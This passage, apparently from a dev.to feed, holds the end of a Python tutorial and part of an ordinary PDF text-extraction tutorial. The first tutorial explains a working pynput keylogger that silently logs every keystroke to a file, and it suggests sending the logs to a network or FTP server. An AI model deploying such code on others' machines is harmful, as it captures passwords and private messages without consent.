                    &lt;span class="n"&gt;datefmt&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;%Y-%d-%M %H:%M:%S&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                    &lt;span class="nb"&gt;format&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;[{asctime}]: {message}&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;


&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;on_press&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;logging&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;


&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;on_release&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;Key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;esc&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;


&lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nc"&gt;Listener&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;on_press&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;on_press&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;on_release&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;on_release&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;listener&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;listener&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;join&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;h2&gt;
  
  
  Code Explanation
&lt;/h2&gt;
&lt;h3&gt;
  
  
  Lines 1-2: Importing Required Libraries
&lt;/h3&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;

&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;pynput.keyboard&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;Key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Listener&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;logging&lt;/span&gt;


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;pynput&lt;/code&gt;: This library allows you to control and monitor input devices.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;logging&lt;/code&gt;: This library is used for tracking events that happen when some software runs&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Lines 5-9: Basic Log Configuration
&lt;/h3&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;

&lt;span class="n"&gt;logging&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;basicConfig&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;keystroke_log.txt&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                    &lt;span class="n"&gt;level&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;logging&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;DEBUG&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                    &lt;span class="n"&gt;style&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                    &lt;span class="n"&gt;datefmt&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;%Y-%d-%M %H:%M:%S&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                    &lt;span class="nb"&gt;format&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;[{asctime}]: {message}&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Here we create basic configuration for the logging system. We will specify the filename where keystrokes will be recorded as &lt;code&gt;keystroke_log.txt&lt;/code&gt; followed by specifying the format in which the keystrokes will be stored which will be:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;[YYYY-MM-DD HH-MM-SS]: 'key'&lt;/code&gt; &lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Lines 12-13: Defining &lt;code&gt;On_Press&lt;/code&gt; Function
&lt;/h3&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;on_press&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;logging&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The function takes &lt;code&gt;key&lt;/code&gt; as an argument, which is the key pressed by the user, and logs it into the file after converting it into a string.&lt;/p&gt;

&lt;h3&gt;
  
  
  Lines 16-18: Defining the &lt;code&gt;On_Release&lt;/code&gt; Function:
&lt;/h3&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;on_release&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;Key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;esc&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The function takes &lt;code&gt;key&lt;/code&gt; as an argument, which again is the key pressed by the user, and will terminate the Keylogger program if the &lt;code&gt;Esc key&lt;/code&gt; is passed as an argument.&lt;/p&gt;

&lt;h3&gt;
  
  
  Lines 21-22: Getting Keystrokes
&lt;/h3&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;

&lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nc"&gt;Listener&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;on_press&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;on_press&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;on_release&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;on_release&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;listener&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;listener&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;join&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;We create an instance of a Listener which would be recording keystrokes and pass the function we created as an argument. Then we use the &lt;code&gt;.join()&lt;/code&gt; method to join it to the main thread. Therefore, every time a key is pressed, the listener is activated and it calls our function which then logs our keystrokes into the file.&lt;/p&gt;

&lt;h2&gt;
  
  
  Running The Python Keylogger
&lt;/h2&gt;

&lt;p&gt;Run the program:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

$ python keylogger.py


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Once the program is launched, you will not notice any activity. The program is running in the background. Just begin to type; when you are ready for the program to terminate, just press the &lt;code&gt;Esc&lt;/code&gt; key. Once you do, you will notice a new file was created, &lt;code&gt;keystroke_log.txt&lt;/code&gt;. This is the file that contains all of the recorded keystrokes.    &lt;/p&gt;

&lt;h2&gt;
  
  
  Examining the &lt;code&gt;Keystroke_log.txt&lt;/code&gt; File
&lt;/h2&gt;

&lt;p&gt;Below is a screenshot of my &lt;code&gt;keystroke_log.txt&lt;/code&gt; file which shows my captured keystrokes: &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fuser-images.githubusercontent.com%2F72005563%2F180667835-91987058-e3c1-437a-9fa4-9b28ae912509.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fuser-images.githubusercontent.com%2F72005563%2F180667835-91987058-e3c1-437a-9fa4-9b28ae912509.png" alt="image"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Now you know how to construct a basic keylogger. This program can be extended to send &lt;code&gt;log files&lt;/code&gt; across the network or even uploaded to an FTP Server where you can download it later for use. Remember, this tutorial and Keylogger script are strictly for educational purposes and it shouldn’t be employed for malicious purposes. Please leave  &lt;code&gt;like&lt;/code&gt; or &lt;code&gt;comment&lt;/code&gt; if you found this article interesting!&lt;/p&gt;

&lt;h3&gt;
  
  
  🔗 Resource Link
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/seraph776/DevCommunity/tree/main/Keylogger" rel="noopener noreferrer"&gt;GitHub Source Code&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>python</category>
      <category>programming</category>
      <category>tutorial</category>
      <category>productivity</category>
    </item>
    <item>
      <title>Extract Text from PDF Using Python</title>
      <dc:creator>Seraph★776</dc:creator>
      <pubDate>Thu, 21 Jul 2022 00:38:00 +0000</pubDate>
      <link>https://dev.to/seraph776/extract-text-from-pdf-using-python-5flh</link>
      <guid>https://dev.to/seraph776/extract-text-from-pdf-using-python-5flh</guid>
      <description>&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;This article will discuss how to extract &lt;code&gt;text&lt;/code&gt; from a &lt;code&gt;PDF&lt;/code&gt; using Python. To complete this task we'll use the &lt;a href="https://pypi.org/project/PyPDF2/"&gt;PyPDF2&lt;/a&gt; module. &lt;code&gt;PyPDF2&lt;/code&gt; is a free and open-source python library capable of many tasks such as splitting, merging, cropping, adding custom data, encrypting, and retrieving text from PDFs.&lt;/p&gt;

&lt;h2&gt;
  
  
  The PDF Sample File
&lt;/h2&gt;

&lt;p&gt;The PDF sample file that will be used to extract text from will be &lt;a href="https://raw.githubusercontent.com/seraph776/CodeCrypt776/main/Python/Projects/PDFtoText/theraven.pdf"&gt;The Raven&lt;/a&gt; by Edgar Allan Poe. &lt;/p&gt;

&lt;h2&gt;
  
  
  Directory Structure
&lt;/h2&gt;

&lt;p&gt;This is the directory structure prior to executing &lt;code&gt;script.py&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Python Project/
├── app/
│   ├── script.py
│   ├── the_raven.pdf
│
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Implementation
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Open PDF and Extract Text&lt;/li&gt;
&lt;li&gt;Save Text to File.&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Open PDF and Extract Text
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;extract_text_from_pdf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pdf_filename&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;text_output&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;''&lt;/span&gt;
    &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nb"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pdf_filename&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;'rb'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;pdf_object&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;pdf_reader&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;PyPDF2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;PdfFileReader&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pdf_object&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nb"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pdf_reader&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;numPages&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
            &lt;span class="n"&gt;page_obj&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;pdf_reader&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;getPage&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;text_output&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="n"&gt;page_obj&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;extractText&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;text_output&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;The &lt;code&gt;convert_pdf_to_text()&lt;/code&gt; function takes one parameter, &lt;code&gt;pdf_filename&lt;/code&gt;, which is the filename of the PDF from which the text will be extracted.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;pdf_filename&lt;/code&gt; is opened in &lt;code&gt;rb&lt;/code&gt; mode (which opens the file in a binary format for reading) as &lt;code&gt;pdf_object&lt;/code&gt;, which is then passed to the &lt;code&gt;PyPDF2&lt;/code&gt; object named &lt;code&gt;pdf_reader&lt;/code&gt;. &lt;/li&gt;
&lt;li&gt;We then iterate over all pages of the &lt;code&gt;PyPDF2&lt;/code&gt; object using the &lt;code&gt;range()&lt;/code&gt; function, and the &lt;code&gt;numPages&lt;/code&gt; attribute to define the upper bound of the range function. &lt;/li&gt;
&lt;li&gt;We then create a &lt;code&gt;page_obj&lt;/code&gt; instance for each page, and extract the text from each &lt;code&gt;page_object&lt;/code&gt; using the &lt;code&gt;extractText()&lt;/code&gt; method.&lt;/li&gt;
&lt;li&gt;Finally, we concatenate the results to our &lt;code&gt;text_output&lt;/code&gt; string, and return the results. &lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Save Text to File.
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;save_converted_text&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;text_file&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nb"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;'w+'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;encoding&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;'utf8'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;file_obj&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;file_obj&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;text_file&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="s"&gt;'&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;text_file&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; has been successfully saved.'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;
&lt;code&gt;save_converted_text()&lt;/code&gt; function takes two parameters, &lt;code&gt;text_file&lt;/code&gt; which is the extracted text from the PDF, and &lt;code&gt;filename&lt;/code&gt; which is the name you will save your file as.  The &lt;code&gt;file name&lt;/code&gt; is opened in &lt;code&gt;w+&lt;/code&gt; mode (&lt;em&gt;write + read&lt;/em&gt;) using &lt;code&gt;'utf8'&lt;/code&gt; &lt;a href="https://dev.to/seraph776/extract-text-from-pdf-using-python#encoding"&gt;encoding&lt;/a&gt; as &lt;code&gt;file_obj&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;The contents of &lt;code&gt;text_file&lt;/code&gt; are then written to &lt;code&gt;file_obj&lt;/code&gt;. A message is printed if the operation executes successfully. &lt;/li&gt;
&lt;/ol&gt;

&lt;h2 id="encoding"&gt; What is Encoding? &lt;/h2&gt;

&lt;p&gt;Many times applications often use internationalized messages to display  output in a variety of user-selected languages such as English, French, Japanese, Hebrew, or Russian. Web content can be written in any of these languages and can also include a variety of emoji symbols. Python’s string type uses the &lt;code&gt;Unicode Standard&lt;/code&gt; for representing characters, which lets Python programs work with all these different possible characters. If encoding is not specified, &lt;code&gt;UTF-8&lt;/code&gt; will be used by default. Read the Official Python Documentation to learn more about &lt;a href="https://docs.python.org/3/howto/unicode.html#encodings"&gt;encoding&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Full Code
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;PyPDF2&lt;/span&gt;


&lt;span class="c1"&gt;# STEP 1: open PDF and convert to text
&lt;/span&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;extract_text_from_pdf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pdf_filename&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;text_output&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;''&lt;/span&gt;
    &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nb"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pdf_filename&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;'rb'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;pdf_object&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;pdf_reader&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;PyPDF2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;PdfFileReader&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pdf_object&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nb"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pdf_reader&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;numPages&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
            &lt;span class="n"&gt;page_obj&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;pdf_reader&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;getPage&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;text_output&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="n"&gt;page_obj&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;extractText&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;text_output&lt;/span&gt;


&lt;span class="c1"&gt;# STEP 2: Save Text to File
&lt;/span&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;save_converted_text&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;text_file&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nb"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;'w+'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;encoding&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;'utf8'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;file_obj&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;file_obj&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;text_file&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="s"&gt;'&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;text_file&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; has been successfully saved.'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;


&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s"&gt;'__main__'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="c1"&gt;# extract text from PDF
&lt;/span&gt;    &lt;span class="n"&gt;text_from_pdf&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;extract_text_from_pdf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;'the_raven.pdf'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="c1"&gt;# save extracted text
&lt;/span&gt;    &lt;span class="n"&gt;save_converted_text&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;text_from_pdf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;'the_raven.txt'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Directory Structure
&lt;/h2&gt;
